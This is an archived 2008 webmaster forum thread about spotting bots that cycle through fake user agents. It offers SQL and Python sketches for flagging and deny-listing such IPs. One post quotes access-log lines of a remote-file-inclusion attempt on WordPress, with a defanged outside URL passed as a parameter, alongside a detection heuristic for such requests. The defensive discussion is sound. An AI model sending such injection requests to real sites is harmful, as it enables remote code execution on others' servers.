WebProWorld Part of WebProNews.com
#1 | wige (WebProWorld Moderator) | 05-12-2008, 12:48 PM
Deluge of the bots

Last Thursday, I developed and implemented a new logging system that aims to identify which products on my site are the most popular. The system is designed to be robust enough both to display a live list of popular products to visitors and to show customized recommendations to users based on their browsing history. I designed it to record not only the product viewed but also the user's IP address and user agent, and to record everything so I could get the largest possible data set to test the system with.

I came in today and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were also the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots that I probably would never have found if not for the filters I added to this system. The following is from one such bot:

Timestamp            IP              User agent
2008-05-09 08:24:08  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
2008-05-09 08:31:45  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
2008-05-09 08:38:27  220.95.108.239  Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site)
2008-05-09 08:44:52  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
2008-05-09 08:55:01  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
2008-05-09 09:23:43  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5
2008-05-09 09:31:08  220.95.108.239  Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
2008-05-09 09:36:59  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
2008-05-09 09:43:15  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
2008-05-09 09:48:44  220.95.108.239  Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
2008-05-09 09:56:14  220.95.108.239  Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
2008-05-09 09:59:23  220.95.108.239  Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
2008-05-09 10:02:03  220.95.108.239  Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
2008-05-09 10:04:41  220.95.108.239  Googlebot/2.1 (+How Google crawls my site)

Of course, this is only the traffic from that one bot, on one product page. There are hits from literally hundreds of similar bots on the same page, and this is spread across thousands of product pages.

Is there any way I might be able to programmatically filter these bad bots out? Even just an SQL query that spots the bots in a somewhat reliable way and lists them would help, so I can remove them from the popularity system and add them to my deny list.
__________________
The best way to learn anything, is to question everything.
Interestingly Average Security Blog

#2 | incrediblehelp (WebProWorld Moderator) | 05-12-2008, 03:28 PM
Re: Deluge of the bots

Why not filter by IP?

#3 | Tech Manager (WebProWorld Pro) | 05-12-2008, 04:18 PM
Re: Deluge of the bots

It doesn't look like a normal bot; it looks more like a malicious one. I've been seeing a lot of these lately. My suggestion is to capture the IP and user agent, store the incoming data, and then query it by IP address and user agent. If more than two user agents show up for the same IP, add that IP to your deny list.
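
A minimal sketch of that check, assuming the page views sit in a table with `IP`, `useragent`, and `productID` columns like the `pageviews` table queried elsewhere in this thread. The in-memory SQLite database, the sample rows (192.0.2.10 is a documentation address, not a real visitor), and the `suspect_ips` and `demo_connection` helpers are illustrative assumptions, not the poster's actual setup:

```python
import sqlite3


def suspect_ips(conn, max_agents=2):
    """Return (ip, agent_count) rows for IPs seen with more than max_agents user agents."""
    cursor = conn.execute(
        """
        SELECT IP, COUNT(DISTINCT useragent) AS agents
        FROM pageviews
        GROUP BY IP
        HAVING COUNT(DISTINCT useragent) > ?
        ORDER BY agents DESC, IP
        """,
        (max_agents,),
    )
    return cursor.fetchall()


def demo_connection():
    """Build a throwaway in-memory table with a few sample rows (hypothetical data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pageviews (IP TEXT, useragent TEXT, productID INTEGER)")
    sample = [
        # Three different agents from one address: over the threshold of two.
        ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)", 1),
        ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1),
        ("220.95.108.239", "Mozilla/4.0 (compatible; MSIE 5.5; Windows 9", 1),
        # Two agents from one address, e.g. two computers behind one home router.
        ("192.0.2.10", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)", 1),
        ("192.0.2.10", "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3", 2),
    ]
    conn.executemany("INSERT INTO pageviews VALUES (?, ?, ?)", sample)
    return conn


if __name__ == "__main__":
    for ip, agents in suspect_ips(demo_connection()):
        print(ip, agents)
```

The threshold is a parameter on purpose: raising `max_agents` trades missed bots for fewer false positives on shared or upgraded machines.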
__________________
I use Country IP Blocks as added security for my networks and servers.

#4 | wige (WebProWorld Moderator) | 05-12-2008, 04:28 PM
Re: Deluge of the bots

Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, this query:

    SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) AS Products
    FROM pageviews
    GROUP BY IP
    ORDER BY Agents DESC;

gives me the following table:

IP               Agents  Products
117.102.128.221  9       1
77.127.155.176   9       1
125.204.58.200   8       1
190.50.125.136   8       1
216.198.139.38   8       1
220.95.108.239   8       1
66.63.219.212    8       1
87.205.215.237   8       1
89.3.18.208      8       1
79.177.161.75    7       1
85.180.253.111   7       1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX. Also, if a user upgrades their browser, or has multiple computers on a home network, they could have more than one user agent logged per IP, and I would not want an automated process to block legitimate traffic as a result of that.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
Last edited by wige : 05-12-2008 at 04:32 PM.

#5 | Tech Manager (WebProWorld Pro) | 05-12-2008, 04:43 PM
Re: Deluge of the bots

Let me give you an example of malicious activity from likely botnets (most likely infected systems). The following shows a single IP address presenting multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious URL can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be Googlebot, but it quickly becomes apparent that it is not. It is obviously attempting to bypass traditional filters that rely on certain criteria, in this case by changing its platform and user agent to cloak its identity. That behavior is itself the signature of undesirable traffic.

In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables.
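
As a rough illustration of the last criterion, the sketch below flags request targets whose query string carries a remote URL as a parameter value, which is the shape of the `?p=http://...` requests in the log above. The function name `has_remote_include`, the list of schemes, and the `example.invalid` host are assumptions made for the example; it is one possible heuristic, not the filter actually used here:

```python
from urllib.parse import parse_qsl, urlsplit

# URL schemes treated as "remote" for this heuristic (an assumption; adjust as needed).
REMOTE_SCHEMES = ("http://", "https://", "ftp://")


def has_remote_include(request_target):
    """Return True if any query-string value in the request target starts with a remote URL scheme."""
    query = urlsplit(request_target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        if value.strip().lower().startswith(REMOTE_SCHEMES):
            return True
    return False


if __name__ == "__main__":
    for target in ("/?p=http://example.invalid/images?", "/?p=42"):
        print(target, has_remote_include(target))
```

A site that legitimately passes URLs in query parameters would need an allowlist on top of this, so treat a match as a reason to look closer rather than as proof.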

In your case I think it is best to contain the IP address if it shows more than two changes, counting both platform and user agent. You could also add a time element into the mix and use it as the deciding factor alongside the first two.
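
One way to combine the user-agent count with a time element is sketched below. It flags an IP only when more than two distinct user agents appear inside a sliding time window. The function name `flag_ips`, the two-hour default window, and the tuple layout of `hits` are all assumptions for illustration; the platform is treated as part of the user agent string rather than as a separate field:

```python
from collections import defaultdict
from datetime import datetime, timedelta


def flag_ips(hits, max_agents=2, window=timedelta(hours=2)):
    """Flag IPs that used more than max_agents distinct user agents within any span of length window.

    hits is an iterable of (ip, user_agent, "YYYY-MM-DD HH:MM:SS") tuples.
    """
    by_ip = defaultdict(list)
    for ip, agent, stamp in hits:
        by_ip[ip].append((datetime.strptime(stamp, "%Y-%m-%d %H:%M:%S"), agent))

    flagged = set()
    for ip, events in by_ip.items():
        events.sort()  # chronological order
        start = 0
        for end in range(len(events)):
            # Shrink the window from the left until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            agents = {agent for _, agent in events[start:end + 1]}
            if len(agents) > max_agents:
                flagged.add(ip)
                break
    return flagged
```

With a short window, a visitor who upgrades a browser or switches computers over several days stays below the threshold, while an address that cycles through agents every few minutes does not.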
Last edited by Tech Manager : 05-12-2008 at 04:57 PM.

#6 | wige (WebProWorld Moderator) | 05-12-2008, 04:55 PM
Re: Deluge of the bots

Cool. My log does look quite similar to yours, so it is probably a similar system to what I am encountering. I guess the final part of this would be, is there a way I can specify a text file for Apache to use as a deny list that can be regularly updated without restarting the server?

#7 | Tech Manager (WebProWorld Pro) | 05-12-2008, 05:00 PM
Re: Deluge of the bots

You could use a text file, but I suggest you use a database solution. Establish the acceptable criteria and then redirect traffic that doesn't meet those criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP. You could even append a message to the redirect if you so choose.

Then you could add problematic IPs to your .htaccess file at a later date. But the database solution will be quicker and will probably use fewer resources than loading the .htaccess file each time.
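
For the later .htaccess step, a small sketch of turning a list of flagged IPs into access-control lines. It emits the `Order`/`Allow`/`Deny` directives of Apache 2.2, which was current when this thread was written; Apache 2.4 replaced them with `Require` directives, so the output would need adapting there. The function name `render_deny_block` is an assumption, and how the lines get merged into an existing .htaccess file is left out:

```python
import ipaddress


def render_deny_block(ips):
    """Build Apache 2.2-style access-control lines that deny the given IP addresses.

    Raises ValueError if any entry is not a valid IP address, so a malformed
    log entry never ends up in the generated configuration.
    """
    unique = sorted(set(ips), key=lambda s: int(ipaddress.ip_address(s)))
    lines = ["Order Allow,Deny", "Allow from all"]
    lines.extend(f"Deny from {ip}" for ip in unique)
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(render_deny_block(["220.95.108.239", "77.127.155.176"]), end="")
```

Because Apache reads .htaccess files at request time, a regenerated file takes effect without restarting the server, at the cost of the per-request file lookup mentioned above.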

Last edited by Tech Manager : 05-12-2008 at 05:06 PM.